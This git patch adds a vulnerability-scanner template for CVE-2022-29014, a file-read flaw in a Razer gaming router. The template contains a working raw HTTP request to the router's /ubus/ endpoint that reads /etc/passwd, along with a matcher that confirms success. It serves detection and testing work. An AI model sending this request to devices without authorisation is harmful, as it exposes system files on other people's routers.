From 4820c890738e0e7c4ab0c8df5ecdae732cffb358 Mon Sep 17 00:00:00 2001 From: edoardottt Date: Thu, 23 Jun 2022 13:57:20 +0200 Subject: [PATCH] Add CVE-2022-29014 --- cves/2022/CVE-2022-29014.yaml | 37 +++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 cves/2022/CVE-2022-29014.yaml diff --git a/cves/2022/CVE-2022-29014.yaml b/cves/2022/CVE-2022-29014.yaml new file mode 100644 index 0000000000..82595341c5 --- /dev/null +++ b/cves/2022/CVE-2022-29014.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-29014 + +info: + name: Razer Sila Gaming Router v2.0.441_api-2.0.418 - LFI + author: edoardottt + severity: high + description: A local file inclusion vulnerability in Razer Sila Gaming Router v2.0.441_api-2.0.418 allows attackers to read arbitrary files. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-29014 + reference: + - https://www.exploit-db.com/exploits/50864 + - https://nvd.nist.gov/vuln/detail/CVE-2022-29014 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29014 + tags: cve,cve2022,razer,lfi,router + +requests: + - raw: + - | + POST /ubus/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP+Cookie+check; + + {"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]} + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 \ No newline at end of file